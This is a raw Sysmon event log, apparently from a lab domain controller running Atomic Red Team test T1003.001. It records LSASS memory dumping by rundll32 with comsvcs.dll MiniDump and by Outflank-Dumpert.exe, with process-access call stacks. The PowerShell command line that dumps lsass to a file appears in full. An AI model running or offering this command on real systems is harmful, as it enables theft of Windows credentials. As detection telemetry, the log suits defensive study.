21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:22.062{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.062{4DB9351A-A33D-60D3-5706-00000000CF01}36046444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d294bf19|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0642|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc027d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d28972db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1d7d1ef|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1de0c61|C:\Windows\assembly\Native
Images_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2c70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2c70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc2b01|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1db3821|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0d63|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc08d5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc0642|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1dc027d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d28972db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1d7d1ef|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+d1de0c61 154100x800000000000000025606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.060{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll MiniDump 628 
C:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp fullC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full} 23542300x800000000000000025646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.859{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79E1AB647802C6B06F4B593B3D4E048E,SHA256=3B805A608DC7FD7F09EA8DC7718883839DD1BF8D260F433F3EE0C3092F1D953B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}22366892C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1b11|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
11241100x800000000000000025644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exeC:\Windows\Temp\dumpert.dmp2021-06-23 21:10:23.718 10341000x800000000000000025643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.718{4DB9351A-A33F-60D3-5A06-00000000CF01}22366892C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1d32|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+19b2|C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe+1fa4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.703{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.687{4DB9351A-A33F-60D3-5906-00000000CF01}65446880C:\Windows\system32\cmd.exe{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.698{4DB9351A-A33F-60D3-5A06-00000000CF01}2236C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=69C05093EB542E1C29A556A29E74E99A,SHA256=F323569E5D64A3AA60045BD06C2421E729D1C0D79028ABA9E227D9EEAEEC62E5,IMPHASH=09D278F9DE118EF09163C6140255C690{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe" 10341000x800000000000000025634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.687{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.672{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.656{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:23.656{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:23.656{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33F-60D3-5906-00000000CF01}6544C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078
